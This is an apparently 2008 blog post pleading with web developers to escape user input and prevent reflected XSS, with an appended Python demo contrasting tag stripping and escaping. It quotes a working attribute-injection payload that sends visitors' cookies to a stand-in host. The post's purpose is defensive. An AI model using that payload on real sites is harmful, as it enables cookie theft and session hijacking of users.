Stop it. Just. Stop. It.
2009-05-03 00:05:20
Fri, 28 Nov 08 18:33:25 -0700
Ok, do I have your attention? Good.
Stop it. Just. Stop. It.
About 70% (from my experience) of websites have an XSS hole somewhere. I really don't understand how hard it is to use the htmlentities() function in PHP,
or Server.HtmlEncode() in ASP,
or any of the numerous such functions in Perl, JSP, SSJS, or anything you choose.
Google it.
The problem arises whenever, for whatever reason, the user's input is output to a page, such as 'Your query, "duhduhduh" returned 0 results.'
Or the data is output into a title tag, or an input tag, or handled by script, or ANYWHERE on a page where the data might be output.
Please. I have seen literally hundreds of sites do some overly complicated series of filters and dynamic outputs, all of which are useless.
It only takes one single unescaped output to leave a page vulnerable to non-persistent XSS.
Case in point:
TheOnion.com recently fixed an XSS vulnerability caused by not escaping quotes in a text input. They used strip_tags(), so they thought they were safe.
Close, but no cigar.
A search engine injection of
" style="position:absolute;top:0;left:0;height:100%;width:100%;z-index:10;" onmouseover="document.location='http://evilsite.com/logger.php?cookie='+document.cookie;
would result in cookie theft, redirection to [insert malicious site here], or any number of browser hijacking attacks.
All due to the failure to escape one character. The double quote (").
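An added illustration, not from the original post, of why tag stripping alone leaves that one character in play. The strip_tags() stand-in and the search-box templates are constructed for this example; Python's html.escape(quote=True) plays the role of PHP's htmlentities() with ENT_QUOTES.

```python
import html
import re

# Constructed sample query containing a double quote: the single character the post
# says the strip_tags()-based filter left untouched.
SAMPLE_QUERY = '" style="color:red'


def strip_tags(text: str) -> str:
    """Rough stand-in for PHP's strip_tags(): removes <...> sequences and nothing else."""
    return re.sub(r"<[^>]*>", "", text)


def render_search_box_stripped(query: str) -> str:
    """The insufficient approach: tags removed, but quotes pass straight through."""
    return f'<input type="text" name="q" value="{strip_tags(query)}">'


def render_search_box_escaped(query: str) -> str:
    """The approach the post recommends: escape every HTML-significant character,
    including both quote styles, before it touches the page."""
    return f'<input type="text" name="q" value="{html.escape(query, quote=True)}">'


def attribute_value(tag: str) -> str:
    """Read the value="..." attribute back out of the rendered tag the way a browser
    would: the attribute ends at the first unescaped double quote."""
    m = re.search(r'value="([^"]*)"', tag)
    return m.group(1) if m else ""


def breaks_out_of_attribute(tag: str, query: str) -> bool:
    """True when the attribute no longer holds the whole query, i.e. the input ended
    the attribute early and the remainder of the input became markup."""
    return html.unescape(attribute_value(tag)) != query


if __name__ == "__main__":
    for name, render in (("strip_tags", render_search_box_stripped),
                         ("htmlentities", render_search_box_escaped)):
        tag = render(SAMPLE_QUERY)
        print(f"{name:12s} -> {tag}")
        print(f"{'':12s}    attribute broken: {breaks_out_of_attribute(tag, SAMPLE_QUERY)}")
```

Running it shows the stripped version's value attribute closing after zero characters, with the rest of the input landing outside it as a new attribute, while the escaped version round-trips the query intact.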
For the love of all that is holy, just use htmlentities() and avoid massive cost and down time.
DO NOT use complicated filters or functions.
DO NOT filter the output differently for different parts of the page.
DO NOT pay an overpriced web developer tens of thousands of dollars to build a website, if he has no clue about security.
Hint: several of the Alexa top 100 sites are vulnerable to non-persistent XSS in the search engine.
This is a very good article on XSS
Just fix it!